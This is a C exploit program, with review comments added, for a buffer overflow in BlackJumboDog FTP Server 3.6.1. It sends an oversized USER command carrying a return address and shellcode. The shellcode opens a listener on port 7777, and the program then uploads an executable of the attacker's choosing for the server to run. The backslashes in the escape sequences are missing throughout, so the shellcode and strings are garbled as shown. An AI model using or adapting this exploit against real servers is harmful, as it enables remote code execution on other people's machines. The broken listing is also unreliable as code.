信息来源:
www.Delikon.de
代码:
/*
6.9.04|[url]www.Delikon.de[/url]|Delikon
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
[url]http://www.securiteam.com/windowsntfocus/5AP040ADPW.html[/url]
Thx to Chew Keong TAN
C:\Codes\blackjumbodog\Release>bjdexploit 192.168.0.3 21 klein.exe
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
[url]http://www.securiteam.com/windowsntfocus/5AP040ADPW.html[/url]
Thx to Chew Keong TAN
Delikon|6.9.04|[url]www.Delikon.de[/url]
[+] Connected.
220 FTP ( BlackJumboDog Version 3.6.1 ) ready
[+]Shellcode length: 461
[+] Sending the shellcode
[+] Sleeping
[+] Opening File
[+] File found ready to send
[+] Connected
[+] Sending executable.
....
[+] All done, server have now executed your executable!
[+] Have a nice day
*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
// Payload string appended to the USER line built in main().
// Per the author's notes: it listens on TCP port 7777, accepts an executable
// over that connection, runs it once the connection is closed, and leaves via
// ExitThread so the hosting service is not crashed. The assembly source is
// referenced at www.delikon.de.
// NOTE(review): the escape backslashes are missing throughout this copy of
// the file (e.g. "xEB" is three printable characters), so the array as shown
// holds ASCII text; main() measures it with strlen().
char shellcode[] = "xEB"
"x10x58x31xC9x66x81xE9x4AxFEx80x30x88x40xE2xFAxEBx05xE8xEBxFF"
"xFFxFFx61xE0x89x88x88xD3xDDx01x6DxEEx09x64xBCx88x01x6ExEEx09"
"x64x84x88x60x57x88x88x88x01x4FxDFxE0x06xC6x86x64x60x63x88x88"
"x88x01xCDx80x05xDBxB8xDAx77xDDx80x01xCDx80x05xDBxB3x01xDExBC"
"xE2x85xD1xEEx09x71x8Fx88xFDx8Bx03xF5x80x01x86xDFx77xFCx03x74"
"x60x37x88x88x88x03x86x01xCCx06x74x6Ax6AxEEx09x64x18x89xDCxE0"
"x89x89x88x88x77xDEx8CxB9x77xDFxDFxDFxDFxCFxDFxCFxDFx77x9Ex01"
"x4BxB9x77xDFxDFxE0x8Ax88x96xE9x01x6AxE2x98xDAxDBx77xDEx80xDF"
"xDBx77xDEx84xDFxDExDBx77xDEx98x01x4BxE2x88xE2x8ExE2x8CxE2x88"
"xE2x8FxE0x88x88x88x68x77xFExBCx77xDExACx01x4Fx09x64x14x77x77"
"x77x01x6Dx05xDDxECxE2x88xE0xECx88x88x88xDAxDBx77xDEx9CxB5x77"
"x77x77x77xFCx9DxB5x88x88x88x88xFCx86x05xDDxECxE2x88xD9xD8xDA"
"xDFx77xDExA0x63x5DxDBx77xDEx90xDFx77xDExA4xE0x8Dx88x88x88x77"
"xFExBCx77xDExA8xB9x77xDFx77xDEx94xDDxDExECx29xB8x88x88x88x03"
"xC8x84x03xF8x94x25x03xE0x80x01x60xD6xD5x4Ax8Cx88xDBxDDxDExDF"
"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x89x62x03xC2x90x03xD2xA8x89"
"x63x6BxBDxC1x03xBCx03x89x66xB9x77x74xB9x48x24xB0x68xFCx8Fx49"
"x47x85x89x4Fx63x7AxB3xF4xACx9CxFDx69x03xD2xACx89x63xEEx03x84"
"xC3x03xD2x94x89x63x03x8Cx03x89x60x61x8Ax88x88x88xB9x48x01x62"
"xD7xD6xD5xD3x4Ax8Cx88x60x1Bx76x77x77x51x81x7Dx25x43x65x74xB3"
"x2Cx92xF8x4Fx2Cx25xA6x61x6DxC1x0ExC1x3Ex91x90x6Fx6FxF1x4ExF1"
"x67x46x68xE8x10x76x02x86x2Dx9Fx88xF4x97xF1x82x60x73x1Fx75x87"
"xDFxDBxBAxD7xBBxBAxA6xCCxC4xC4x88xDAxB8xB8xFCxA6xEDxF0xEDx88";
// Connect to ip:port over TCP and stream the contents of FileName to the
// peer in chunks of up to 1024 bytes, pausing 200 ms between chunks.
// Returns 1 when the loop completes, 0 on any failure (a message is printed
// to stdout before returning).
// NOTE(review): the FILE* is never fclose()d, sockfd is not closed on the
// error paths below, and WSACleanup() is called here although the caller
// (main) still holds its own socket.
int fileupload(int port,char *FileName,char* ip){
FILE* file;
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024];
char *a=NULL; // unused
int read=0; // item count returned by the most recent fread()
printf("[+] Opening Filen");
file = fopen(FileName,"rb");
if (file==NULL) {
printf("[-] Open Failedn");
return 0;
}
printf("[+] File found ready to sendn");
if ((he=gethostbyname(ip)) == NULL) { // get the host info
printf("[-] GetHostByName() Error!n");
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!n");
return 0;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(port); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
// sin_zero is left uninitialised: the clearing memset is commented out.
//memset(&(their_addr.sin_zero), '', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
printf("[-] Connecting errorn");
return 0;
}
printf("[+] Connectedn[+] Sending executable.n");
// Chunked copy loop. fread()'s result is not checked for a read error, a
// short send() (numbytes < read) is not retried, and when the file size is
// a multiple of 1024 the last iteration sends zero bytes before feof()
// becomes true.
while (!feof(file)) {
read = fread(buf,sizeof(char),sizeof(buf),file);
Sleep(200); // throttle: 200 ms between chunks
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failedn");
return 0;
}
printf("."); // one dot per chunk as progress
}
printf("n[+] All done, server have now executed your executable!n");
closesocket(sockfd);
WSACleanup();
return 1;
}
// Print the tool's identification banner (advisory reference and author
// credit) to stdout. The strings contain no conversion specifiers, so
// fputs() produces exactly the same output as the original printf() calls;
// the stray "n" characters are what is left of "\n" escapes in this copy.
void banner(){
static const char *const banner_lines[] = {
"BlackJumboDog FTP Server Buffer Overflow version 3.6.1nhttp://www.securiteam.com/windowsntfocus/5AP040ADPW.htmlnThx to Chew Keong TANn",
"nDelikon|6.9.04|[url]www.Delikon.den[/url]"
};
for (size_t i = 0; i < sizeof banner_lines / sizeof banner_lines[0]; i++) {
fputs(banner_lines[i], stdout);
}
}
// Print the one-line command syntax to stdout. The literal has no
// conversion specifiers, so fputs() matches the original printf() output.
void usage(){
static const char usage_text[] = "nBJDExploit HOST PORT FileToUploadn";
fputs(usage_text, stdout);
}
//#pragma lib <ws2_32.lib>
#pragma comment(lib,"ws2_32.lib")
// Entry point: BJDExploit HOST PORT FileToUpload.
// Connects to HOST:PORT, echoes the server greeting, sends one oversized
// USER line built from padding, RetAddr and the shellcode array, waits two
// seconds, then calls fileupload() against port 7777 on the same host.
// Returns 0 on completion, -1 on a Winsock/connect failure; exit(1) on usage
// error.
// NOTE(review): the argument check only requires argc >= 3, yet argv[3] is
// passed to fileupload(); with exactly two arguments that pointer is NULL.
int main(int argc,char *argv[]) {
int sockfd, numbytes;
// Author's note: they had trouble with return addresses; only this one
// worked for them, other SEH addresses were not executed, reason unknown.
DWORD RetAddr=0x6BD01395;
/* SYNCOR11.DLL XP sp2 full patched english version
6BD01395 5E POP ESI
6BD01396 33C0 XOR EAX,EAX
6BD01398 5D POP EBP
6BD01399 C2 0800 RETN 8
*/
struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024]; // receive buffer for the greeting, then the outgoing USER line
int read=0;
WSADATA wsaData;
if(argc<3){
banner();
usage();
exit(1);
}
banner();
if(WSAStartup(0x101,&wsaData)) // request Winsock 1.1
{
printf("[-] Unable to load winsock.n");
return -1;
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
printf("[-] GetHostByName() Error!n");
return -1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!n");
return -1;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(atoi(argv[2])); // port; atoi() yields 0 for non-numeric input
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
// sin_zero is left uninitialised: the clearing memset is commented out.
//memset(&(their_addr.sin_zero), '', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
printf("[-] Connecting errorn");
return -1;
}
printf("n[+] Connected.n");
// Read and echo the server greeting.
// NOTE(review): numbytes is used as an index unchecked: recv() returns
// SOCKET_ERROR (-1) on failure and may return exactly sizeof(buf) on
// success; in both cases the terminator is written outside buf.
read=sizeof(buf);
numbytes=recv(sockfd,buf,read,0);
buf[numbytes]=0x00;
printf("%s n",buf);
memset(buf,0x00,sizeof(buf));
Sleep(200);
// Build the USER line in place. Every append positions itself with
// strlen(buf), which only works because buf was zeroed above and none of
// the appended bytes is NUL; no bound against sizeof(buf) is checked.
strcpy(buf,"USER ");
memset(buf+strlen(buf),0x41,308);
memcpy(buf+strlen(buf),"xebx06",2);
memset(buf+strlen(buf),0x41,2);
memcpy(buf+strlen(buf),&RetAddr,4);
strcat(buf,shellcode);
buf[strlen(buf)]='x0a'; // multi-character constant: implementation-defined value
printf("[+]Shellcode length: %i n",strlen(shellcode)); // %i with a size_t argument
read =strlen(buf);
numbytes=send(sockfd,buf,read,0); // return value is not checked
printf("[+] Sending the shellcoden");
Sleep(2000); // presumably gives the server time before the upload connection
printf("[+] Sleepingn");
// fileupload() calls WSACleanup() itself, so the closesocket()/WSACleanup()
// below run after Winsock has already been torn down.
if(fileupload(7777,argv[3],argv[1]))
printf("[+] Have a nice dayn");
closesocket(sockfd);
WSACleanup();
return 0;
}